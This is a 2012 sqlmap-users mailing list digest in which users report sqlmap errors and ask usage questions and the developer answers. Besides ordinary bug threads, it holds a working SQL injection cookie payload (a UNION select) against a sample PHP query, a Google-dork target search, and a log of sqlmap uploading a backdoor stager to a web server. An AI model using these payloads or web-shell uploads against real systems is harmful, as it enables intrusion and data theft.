> > > Does anyone have any experience injecting this late in a query? Any
> > > ideas would be greatly received.
> > >
> > > Regards
> > >
> > > Chris
> > >
> > >
> > > ------------------------------------------------------------------------------
> > > Live Security Virtual Conference
> > > Exclusive live event will cover all the ways today's security and
> > > threat landscape has changed and how IT managers can respond. Discussions
> > > will include endpoint security, mobile security and the latest in malware
> > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > > _______________________________________________
> > > sqlmap-users mailing list
> > > sql...@li...
> > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
>
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 11
> Date: Sun, 05 Aug 2012 14:06:55 +0400
> From: Happy User <rob...@gm...>
> Subject: [sqlmap-users] MemoryError
> To: sql...@li...
> Message-ID: <501...@gm...>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> [*] starting at 14:00:21
>
> [14:00:22] [INFO] testing connection to the target url
> [14:00:23] [INFO] testing if the url is stable, wait a few seconds
> [14:00:24] [INFO] url is stable
> [14:00:24] [INFO] testing if GET parameter 'block' is dynamic
> [14:00:25] [INFO] confirming that GET parameter 'block' is dynamic
> [14:00:27] [INFO] GET parameter 'block' is dynamic
> [14:00:36] [WARNING] large response detected. This could take a while
>
> [14:02:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b483710,
> retry your run with the latest development version from the GitHub
> repository. If the exception persists, please send by e-mail to
> 'sql...@li...' or open a new issue at
> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-b483710
> Python version: 2.7.3
> Operating system: nt
> Command line: D:\Soft\sqlmap-dev\sqlmap.py -u
> ************************************ --current-user --current-db
> --is-dba --tables --dbs -c bulk
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main
>     start()
>   File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 458, in start
>     check = heuristicCheckSqlInjection(place, parameter)
>   File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 627, in heuristicCheckSqlInjection
>     page, _ = Request.queryPage(payload, place, content=True, raise404=False)
>   File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 732, in queryPage
>     page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 498, in getPage
>     page = page if isinstance(page, unicode) else getUnicode(page)
>   File "D:\Soft\sqlmap-dev\lib\core\common.py", line 1861, in getUnicode
>     return unicode(value, UNICODE_ENCODING, "replace")
>   File "C:\Python27\lib\encodings\utf_8.py", line 16, in decode
>     return codecs.utf_8_decode(input, errors, True)
> MemoryError
>
> [*] shutting down at 14:02:56
>
>
>
> ------------------------------
>
> Message: 12
> Date: Tue, 7 Aug 2012 00:01:31 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] sqlmap error
> To: D Atkin <je...@ho...>
> Cc: sql...@li...
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> Metasploit's module sqlmap(.rb) is obsolete.
>
> Kind regards,
> Miroslav Stampar
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 13
> Date: Tue, 7 Aug 2012 00:54:32 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] MemoryError
> To: Happy User <rob...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> This should be "patched" now [1], but nevertheless, it's interesting that
> you are getting such large response immediately in such early phase. If you
> don't mind you could send me more info privately.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/139
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 14
> Date: Tue, 7 Aug 2012 14:24:35 +1000
> From: Peter Thomas <pe...@ha...>
> Subject: Re: [sqlmap-users] Disable output coloring
> To: sql...@li...
> Message-ID:
> <CAH...@ma...>
> Content-Type: text/plain; charset=UTF-8
>
> I agree that it would be handy to have a way to disable the color output.
>
> We also output to text for sending in our automated email reports.
>
> The other alternative is to use sed.
>
> sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mK]//g"
>
>
> --
> Regards,
>
> Peter
> --------------------------------------------------
> Security Scanning Tools On-line
> Web: http://hackertarget.com/
> --------------------------------------------------
>
> > [sqlmap-users] Disable output coloring
> > From: M Zverev <roberthacksley@gm...> - 2012-08-02 11:18
> >
> > I often redirect sqlmap output to a text file with the command >, and
> > that leaves annoying marks like
> > [0m
> >
> > > [31m
> > at the beginning and the end of lines, and I have to clean that out.
> > Is there a way to disable output coloring?
>
> ------------------------------
>
> Message: 15
> Date: Tue, 7 Aug 2012 10:59:10 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Disable output coloring
> To: Peter Thomas <pe...@ha...>
> Cc: sql...@li...
> Message-ID:
> <CA+...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> This should be fixed now [1]. sqlmap should handle this recognition of
> redirected output automatically from now on.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/140
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 16
> Date: Tue, 7 Aug 2012 22:25:42 +1000
> From: Peter Thomas <pe...@ha...>
> Subject: Re: [sqlmap-users] Disable output coloring
> To: Miroslav Stampar <mir...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CAH...@ma...>
> Content-Type: text/plain; charset=UTF-8
>
> Thanks Miroslav,
>
> Feature / bug fix completed in under 4 hours. Nice work!
>
> --
> Regards,
>
> Peter
> --------------------------------------------------
> Security Scanning Tools On-line
> Web: http://hackertarget.com/
> --------------------------------------------------
>
> ------------------------------
>
> Message: 17
> Date: Fri, 3 Aug 2012 17:27:30 -0700 (PDT)
> From: muhammad husaini harun <hus...@ya...>
> Subject: [sqlmap-users] ask error in sqlmap
> To: "sql...@li..."
> <sql...@li...>
> Message-ID:
> <134...@we...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hello, I get an error when scanning using sqlmap?
>
> [08:17:12] [CRITICAL] all parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing a valid value for option '--regexp' as perhaps the regular expression that you have choosen does not match exclusively True responses
>
> [*] shutting down at 08:17:12
>
> ------------------------------
>
> Message: 18
> Date: Wed, 8 Aug 2012 10:15:09 -0500
> From: Brandon Perry <bpe...@gm...>
> Subject: Re: [sqlmap-users] ask error in sqlmap
> To: muhammad husaini harun <hus...@ya...>
> Cc: "sql...@li..."
> <sql...@li...>
> Message-ID:
> <CAO...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> This isn't an error. It is telling you all params in the query are not
> injectable.
>
> ------------------------------
>
> Message: 19
> Date: Thu, 9 Aug 2012 09:53:19 +0200
> From: Marco Mirandola <mm...@gm...>
> Subject: [sqlmap-users] tag FORM not supported
> To: sql...@li...
> Message-ID:
> <CACzG1hLQgfSvsRdCqpsM_ekg0qJHsSkRr0msM6iyf4hYJr_=mQ...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Sqlmap team :-)
>
> This is the error:
>
> =====================================================================
> [09:40:35] [INFO] testing connection to the target url
> [09:40:36] [INFO] searching for forms
> [09:40:37] [CRITICAL] there has been a problem while processing page forms
> ('unk
> nown GET form encoding type 'multipart/form-data'')
> =====================================================================
>
> And this is the stub of html page
> =====================================================================
>
> <form name="choice" enctype="multipart/form-data" method="GET"
> action="/result.php" style="display:inline;">
> <select style="margin-bottom:10px;" name="categoria" id="categoria">
> <option value="">Tutti</option>
> <option selected="selected" >Coppie</option>
> <option value="a">a</option>
> <option value="b">b</option>
> <option value="c">c</option>
> <option value="d">d</option>
> <option >e</option>
> <option >f</option>
> <option >g</option>
> <option >h</option>
> <option value="i">i</option>
> </select>
> <br>
> <select name="regione" id="regione" style="margin-top:8px;
> margin-bottom:8px;">
> <option selected="selected"></option>
> <option></option>
> <option value="Abruzzo" >Abruzzo</option>
> <option value="Basilicata" >Basilicata</option>
> <option value="Calabria" >Calabria</option>
> <option value="Campania" >Campania</option>
> <option value="Emilia Romagna" >Emilia Romagna</option>
> <option value="Friuli" >Friuli</option>
> <option value="Lazio">Lazio</option>
> <option value="Liguria" >Liguria</option>
> <option value="Lombardia" >Lombardia</option>
> <option value="Marche" >Marche</option>
> <option value="Molise" >Molise</option>
> <option value="Piemonte" >Piemonte</option>
> <option value="Puglia" >Puglia</option>
> <option value="Sardegna" >Sardegna</option>
> <option value="Sicilia" >Sicilia</option>
> <option value="Toscana" >Toscana</option>
> <option value="Trentino" >Trentino</option>
> <option value="Umbria" >Umbria</option>
> <option value="ValleAosta" >Valle d'Aosta</option>
> <option value="Veneto" >Veneto</option>
> <option value="estero" >...all'estero</option>
> </select><br />
> <input name="check1" type="checkbox" value="1" />
> <input name="check1" type="checkbox" value="1" />
> <input name="check1" type="checkbox" value="1" />
> <br />
> <input type="Image" name="Invia" img src="
> http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/img/go.gif"
> width="55" height="19">
> </div>
> </form>
>
> =====================================================================
>
> Best regards
>
> Marco Mirandola
>
> ------------------------------
>
> Message: 20
> Date: Thu, 9 Aug 2012 16:06:59 +0800
> From: Timon Wang <tim...@gm...>
> Subject: Re: [sqlmap-users] tag FORM not supported
> To: Marco Mirandola <mm...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CAH+8Fsw5jKctkXP77EkR7ZH93Uy6Gb1e=HOd-k=Z_z...@ma...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> So special...
> Form method is get, and enctype equals multipart/form-data. That's not
> a valid form, you can't use this to upload file or submit data I
> think.
>
> --
> Focus on: Network security,Scanner,NodeJS,JAVA,WWW
> Blog: http://www.nohouse.net
>
> ------------------------------
>
> Message: 21
> Date: Thu, 9 Aug 2012 11:33:55 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] tag FORM not supported
> To: Timon Wang <tim...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CA+9yoX0y5=K2qzgUhDgGCpQrh=V679WVrP=y8c...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all.
>
> Timon is right. I don't have anything more to say.
>
> Kind regards,
> Miroslav Stampar
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 22
> Date: Thu, 9 Aug 2012 12:23:47 +0200
> From: Marco Mirandola <mm...@gm...>
> Subject: Re: [sqlmap-users] tag FORM not supported
> To: Miroslav Stampar <mir...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CACzG1h+fNw5PMZ+=4fw...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> But rather than check enctype = "multipart / form-data", which in my case
> does not include any upload (see attached html), because not only excludes
> only the possible upload?
> we are in the attached example:
>
> 2 select (combobox)
> 3 checkboxes
>
> both valid for the injection ...
>
> ------------------------------
>
> Message: 23
> Date: Thu, 9 Aug 2012 11:42:03 +0100
> From: Chris Oakley <chr...@gm...>
> Subject: Re: [sqlmap-users] tag FORM not supported
> To: Marco Mirandola <mm...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CAF6VE=oG1c5TSXvAN6C6SXyLkMHLXTqFRWju=qe_...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Even though it's wrong to use GET with this enctype, I think it will still
> work:
>
> http://oi49.tinypic.com/2yn2r9w.jpg
>
> So if this is interacting with a database, there could still be an
> injection. Perhaps the check that sqlmap does is too simplistic?
>
> Regards
>
> Chris
>
> ------------------------------
>
> Message: 24
> Date: Thu, 9 Aug 2012 13:48:45 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] tag FORM not supported
> To: Chris Oakley <chr...@gm...>
> Cc: sql...@li...
> Message-ID:
> <CA+9yoX2EX-Gx9Ji_JCDaa_dpxzMfLNymQh-t3__CQSUArr-=9w...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi.
>
> This is solely coming from a 3rd party library ClientForm [1] and we don't
> like to change anything inside those. Nevertheless, find it "patched" with
> the latest commit [2].
>
> Kind regards,
> Miroslav Stampar
>
> [1] http://pypi.python.org/pypi/ClientForm/0.2.10
> [2] https://github.com/sqlmapproject/sqlmap/issues/143
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------
>
> Message: 25
> Date: Thu, 16 Aug 2012 12:35:25 +0700
> From: root rieqy <roo...@gm...>
> Subject: [sqlmap-users] Rieqy Erysya
> To: sql...@li...
> Message-ID: > <CAN...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hello sqlmap team :D > i had download new version of sqlmap(sqlmap version 1.0) > and i have always get error when every i write : > [code]F:\sqlmap>sqlmap.py -g "inurl:view.php?id=23"[/code] > it syntax giving error like this: > [code][12:21:35] [CRITICAL] unable to find results for your Google dork > expression[/code] > > why it happened ? whereas I've download new version of sqlmap > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 26 > Date: Thu, 16 Aug 2012 11:33:24 +0200 > From: Miroslav Stampar <mir...@gm...> > Subject: Re: [sqlmap-users] Rieqy Erysya > To: root rieqy <roo...@gm...> > Cc: sql...@li... > Message-ID: > <CA+...@ma...> > Content-Type: text/plain; charset="iso-8859-1" > > Hi. > > Find it fixed now [1]. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/59 > > On Thu, Aug 16, 2012 at 7:35 AM, root rieqy <roo...@gm...> wrote: > > > Hello sqlmap team :D > > i had download new version of sqlmap(sqlmap version 1.0) > > and i have always get error when every i write : > > [code]F:\sqlmap>sqlmap.py -g "inurl:view.php?id=23"[/code] > > it syntax giving error like this: > > [code][12:21:35] [CRITICAL] unable to find results for your Google dork > > expression[/code] > > > > why it happened ? whereas I've download new version of sqlmap > > > > > > > > ------------------------------------------------------------------------------ > > Live Security Virtual Conference > > Exclusive live event will cover all the ways today's security and > > threat landscape has changed and how IT managers can respond. Discussions > > will include endpoint security, mobile security and the latest in malware > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... 
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 27 > Date: Fri, 17 Aug 2012 14:10:53 +0200 > From: Sergio Molina <sm...@wp...> > Subject: [sqlmap-users] Anyone having trouble with --eval? > To: sql...@li... > Message-ID: > <CAF...@ma...> > Content-Type: text/plain; charset="windows-1252" > > Hi there > > Just downloaded latest dev version (actually I did yesterday). I am having > trouble with --eval, sqlmap complains when running evaluateCode with > modified parameters (something like pincode=abc123'' stuff). More > precisely, the following lines in lib/request/connect.py: > > for part in item.split(delimiter): > if '=' in part: > name, value = part.split('=', 1) > evaluateCode("%s='%s'" % (name, value), variables) > > When providing next value for --eval: > > --eval "import random;import urllib2;numRequest=random.randint(1, > 999999999);userId='sq...@wp...'+str(numRequest);headers = { > 'Accept-Language' : 'en-us,en;q=0.5 '}; req = > urllib2.Request('${SAFE_UPSELL_URL}&userId='+ userId, None, headers); > response = urllib2.urlopen(req);" > > Just want to do something like --safe-url and --safe-freq combination but > using same userId for both related requests while using different userId for > every other pair of requests. > > Sorry I am not good at python. Am I missing anything ? Or is it a bug ? > > Thanks in advance ! > > Regards > Sergio M > -------------- next part -------------- > An HTML attachment was scrubbed... > > ------------------------------ > > Message: 28 > Date: Mon, 20 Aug 2012 00:11:40 +0400 > From: Happy User <rob...@gm...> > Subject: [sqlmap-users] UnicodeEncodeError: 'ascii' codec can't encode > characters in position 32-47: ordinal not in range(128) > To: sql...@li... 
> Message-ID: <503...@gm...> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Traceback (most recent call last): > File "D:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > start() > File "D:\Soft\sqlmap-dev\lib\controller\controller.py", line 355, in > start > checkNullConnection() > File "D:\Soft\sqlmap-dev\lib\controller\checks.py", line 960, in > checkNullConnection > page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) > File "D:\Soft\sqlmap-dev\lib\request\connect.py", line 322, in getPage > conn = urllib2.urlopen(req) > File "C:\Python27\lib\urllib2.py", line 126, in urlopen > return _opener.open(url,... [truncated message content] |
From: Miroslav S. <mir...@gm...> - 2012-09-14 22:31:25
|
Hi. In that case could you please send the sqlmap traffic file got by using -t traffic.txt along with your standard switches/options? Kind regards, Miroslav Stampar On Sat, Sep 15, 2012 at 12:09 AM, Stephen Shkardoon <ss...@ss...>wrote: > Hi, > > Sorry, my mistake. I just copied the line and altered it to show that the > cookie was being used. In the real script, there was no parse error. > Nonetheless, sqlmap cannot pull out results. > > Thanks > ss23 > > On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> I am not sure how are you able to "definitely able to pull out results" >> as as I can see the problem lies in used PHP (enclosed pair of single >> quotes with another pair of single quotes): >> >> Bad: >> $res = mysql_query("SELECT userid, custname, custemail, owing FROM >> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE >> sessionid = *'$_COOKIE['sesh']'*)"); >> >> Good 1: >> $res = mysql_query("SELECT userid, custname, custemail, owing FROM >> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE >> sessionid = *'$_COOKIE[sesh]'*)"); >> >> Good 2: >> $res = mysql_query("SELECT userid, custname, custemail, owing FROM >> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE >> sessionid = " . *$_COOKIE['sesh'] . "*)"); >> >> With that code of yours you should get an ugly PHP error message: >> "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, >> expecting T_STRING or T_VARIABLE or T_NUM_STRING" >> >> Also, you could take a look at similar case here [1]. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html >> >> On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote: >> >>> Hi all, >>> >>> Trying to do a (simple) injection with sqlmap, and I can't seem to coax >>> it into getting it right. 
>>> The PHP source looks something like: >>> >>> $res = mysql_query("SELECT userid, custname, custemail, owing FROM >>> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE >>> sessionid = '$_COOKIE['sesh']')"); >>> >>> and then it displays the fields it pulled out. >>> >>> The command(s) I've tried look something like ./sqlmap.py -u >>> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5 >>> --risk=5. However, the only injection point it finds is AND/OR time-based >>> blind, which is horribly slow. Of course, manually, I can do a >>> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so >>> I'm definitely able to pull out results. >>> >>> Anything I can do to push sqlmap in the right direction? >>> >>> Thanks, >>> ss23 >>> >>> >>> ------------------------------------------------------------------------------ >>> Got visibility? >>> Most devs has no idea what their production app looks like. >>> Find out how fast your code is with AppDynamics Lite. >>> http://ad.doubleclick.net/clk;262219671;13503038;y? >>> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > -- Miroslav Stampar http://about.me/stamparm |
From: Stephen S. <ss...@ss...> - 2012-09-14 22:10:02
|
Hi, Sorry, my mistake. I just copied the line and altered it to show that the cookie was being used. In the real script, there was no parse error. Nonetheless, sqlmap cannot pull out results. Thanks ss23 On Sat, Sep 15, 2012 at 9:55 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > I am not sure how are you able to "definitely able to pull out results" as > as I can see the problem lies in used PHP (enclosed pair of single quotes > with another pair of single quotes): > > Bad: > $res = mysql_query("SELECT userid, custname, custemail, owing FROM > custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE > sessionid = *'$_COOKIE['sesh']'*)"); > > Good 1: > $res = mysql_query("SELECT userid, custname, custemail, owing FROM > custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE > sessionid = *'$_COOKIE[sesh]'*)"); > > Good 2: > $res = mysql_query("SELECT userid, custname, custemail, owing FROM > custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE > sessionid = " . *$_COOKIE['sesh'] . "*)"); > > With that code of yours you should get an ugly PHP error message: > "Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, > expecting T_STRING or T_VARIABLE or T_NUM_STRING" > > Also, you could take a look at similar case here [1]. > > Kind regards, > Miroslav Stampar > > [1] > http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html > > On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...>wrote: > >> Hi all, >> >> Trying to do a (simple) injection with sqlmap, and I can't seem to coax >> it into getting it right. >> The PHP source looks something like: >> >> $res = mysql_query("SELECT userid, custname, custemail, owing FROM >> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE >> sessionid = '$_COOKIE['sesh']')"); >> >> and then it displays the fields it pulled out. 
>> >> The command(s) I've tried look something like ./sqlmap.py -u >> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5 >> --risk=5. However, the only injection point it finds is AND/OR time-based >> blind, which is horribly slow. Of course, manually, I can do a >> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so >> I'm definitely able to pull out results. >> >> Anything I can do to push sqlmap in the right direction? >> >> Thanks, >> ss23 >> >> >> ------------------------------------------------------------------------------ >> Got visibility? >> Most devs has no idea what their production app looks like. >> Find out how fast your code is with AppDynamics Lite. >> http://ad.doubleclick.net/clk;262219671;13503038;y? >> http://info.appdynamics.com/FreeJavaPerformanceDownload.html >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: Miroslav S. <mir...@gm...> - 2012-09-14 21:55:21
|
Hi.

I am not sure how are you able to "definitely able to pull out results" as, as I can see, the problem lies in used PHP (enclosed pair of single quotes with another pair of single quotes):

Bad:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = *'$_COOKIE['sesh']'*)");

Good 1:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = *'$_COOKIE[sesh]'*)");

Good 2:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = " . *$_COOKIE['sesh'] . "*)");

With that code of yours you should get an ugly PHP error message:
"Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING"

Also, you could take a look at similar case here [1].

Kind regards,
Miroslav Stampar

[1] http://www.hotscripts.com/forums/php/21179-php-parse-error-parse-error-unexpected-t_encapsed_and_whitespace-expecting-t_strin.html

On Fri, Sep 14, 2012 at 8:08 PM, Stephen Shkardoon <ss...@ss...> wrote:
> Hi all,
>
> Trying to do a (simple) injection with sqlmap, and I can't seem to coax it
> into getting it right.
> The PHP source looks something like:
>
> $res = mysql_query("SELECT userid, custname, custemail, owing FROM
> custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE
> sessionid = '$_COOKIE['sesh']')");
>
> and then it displays the fields it pulled out.
>
> The command(s) I've tried look something like ./sqlmap.py -u
> site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
> --risk=5. However, the only injection point it finds is AND/OR time-based
> blind, which is horribly slow. Of course, manually, I can do a
> sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
> I'm definitely able to pull out results.
>
> Anything I can do to push sqlmap in the right direction?
>
> Thanks,
> ss23
>
>
> ------------------------------------------------------------------------------
> Got visibility?
> Most devs has no idea what their production app looks like.
> Find out how fast your code is with AppDynamics Lite.
> http://ad.doubleclick.net/clk;262219671;13503038;y?
> http://info.appdynamics.com/FreeJavaPerformanceDownload.html
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

--
Miroslav Stampar
http://about.me/stamparm |
From: Stephen S. <ss...@ss...> - 2012-09-14 18:09:02
|
Hi all,

Trying to do a (simple) injection with sqlmap, and I can't seem to coax it into getting it right.
The PHP source looks something like:

$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid = '$_COOKIE['sesh']')");

and then it displays the fields it pulled out.

The command(s) I've tried look something like ./sqlmap.py -u site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5 --risk=5. However, the only injection point it finds is AND/OR time-based blind, which is horribly slow. Of course, manually, I can do a sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so I'm definitely able to pull out results.

Anything I can do to push sqlmap in the right direction?

Thanks,
ss23 |
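Added example (not part of the original messages, and not sqlmap or application code): the query from the post above, built once by pasting the cookie between quotes and once with a bound parameter. Python's sqlite3 stands in for PHP/MySQL, the rows are constructed, and the function names are hypothetical; the cookie value is the one quoted in the post.

```python
import sqlite3
from urllib.parse import unquote

# Cookie value exactly as quoted in the post (URL-encoded).
COOKIE_FROM_POST = "')%20UNION%20select%201,2,3,4%20--%20"

# Query text from the post, up to the point where the cookie is inserted.
QUERY_HEAD = (
    "SELECT userid, custname, custemail, owing FROM custdata AS cd "
    "WHERE cd.userid = (SELECT userid FROM ccc_users AS cu "
    "WHERE sessionid = "
)


def build_db():
    """In-memory stand-in for the application's database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE ccc_users (userid INTEGER, sessionid TEXT);
        CREATE TABLE custdata (userid INTEGER, custname TEXT,
                               custemail TEXT, owing INTEGER);
        INSERT INTO ccc_users VALUES (7, 'constructed-session-id');
        INSERT INTO custdata VALUES (7, 'Alice Example',
                                     'alice@example.test', 120);
        """
    )
    return db


def lookup_interpolated(db, sesh):
    """Same construction as the PHP in the post: cookie pasted between quotes."""
    sql = QUERY_HEAD + "'" + sesh + "')"
    return db.execute(sql).fetchall()


def lookup_bound(db, sesh):
    """Hardened form: the cookie travels as a bound parameter, never as SQL."""
    sql = QUERY_HEAD + "?)"
    return db.execute(sql, (sesh,)).fetchall()


def greeting(rows):
    """Mimics the 'Hi, <custname>!' line of the account page."""
    return "Hi, %s!" % rows[0][1] if rows else "no account for this session"


if __name__ == "__main__":
    db = build_db()
    cookie = unquote(COOKIE_FROM_POST)
    for label, value in (("valid session", "constructed-session-id"),
                         ("cookie from the post", cookie)):
        print(label)
        print("  interpolated:", greeting(lookup_interpolated(db, value)))
        print("  bound       :", greeting(lookup_bound(db, value)))
```

With the interpolated query the cookie closes the string and the subquery, so the page renders the UNION row; with the bound parameter the same bytes are only compared against sessionid and match nothing.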
From: Robin W. <ro...@di...> - 2012-09-14 14:48:26
|
On 14 September 2012 13:49, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > Original stager(.php) size is indeed 703 bytes, so sqlmap is not wrong in > your case. You can check it by going into ./shell and running: "find > backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i > '{}' \;" > > If you want to debug you could try watching traffic with -v 5 or by > capturing it with -t traffic.txt. Maybe something interesting could be found > there. I backed up my output directory then deleted and re-checked out everything and now it is working. I guess something got cached based on an old version of the shell. Robin > Kind regards, > Miroslav Stampar > > On Fri, Sep 14, 2012 at 2:12 PM, Robin Wood <ro...@di...> wrote: >> >> Looks like you've updated the shell sent over with os-shell but not >> updated the size that the script checks to see if it exists. >> >> Robin >> >> [13:08:22] [WARNING] unable to retrieve the web server document root >> please provide the web server document root [/var/www/]: >> /var/www/html/upload/ >> [13:08:29] [WARNING] unable to retrieve any web server path >> please provide any additional web server full path to try to upload >> the agent [Enter for None]: >> [13:08:30] [WARNING] unable to upload the file stager on >> '/var/www/html/upload' >> [13:08:30] [INFO] trying to upload the file stager via UNION technique >> do you want confirmation that the file >> '/var/www/html/upload/tmpuivks.php' has been successfully written on >> the back-end DBMS file system? 
